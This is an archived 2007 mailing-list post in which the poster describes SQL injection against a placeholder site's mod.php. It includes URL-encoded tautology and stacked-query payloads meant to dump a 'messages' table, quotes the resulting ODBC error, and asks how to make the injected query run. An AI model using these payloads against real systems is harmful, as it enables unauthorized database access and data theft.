From: Danux (danuxx@gmail.com)
Date: Tue Oct 09 2007 - 20:24:45 EDT
Hi, well, after taking some examples from you (thanks in advance), i
am able to bypass single quotes son i can inject something simple as:
http://www.site.com/mod.php?id=1%27%20or%201=1--
But now, when trying to print a full table.... with the following injection...:
http://www.site.com/mod.php?id=1%27%20or%201=1--;select%20*%20from%20messages;--
there is a Warning saying that the Connecction is busy:
Warning: odbc_exec() [function.odbc-exec]: SQL error: [Microsoft][ODBC
SQL Server Driver]Connection is busy with results for another hstmt,
SQL state S1000 in SQLExecDirect in .........mod.php
So, i think i need a way to execute the second query (mine) before the
one that mod.php executes by itself (mod.php?id=1)
What you think?
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:09 EDT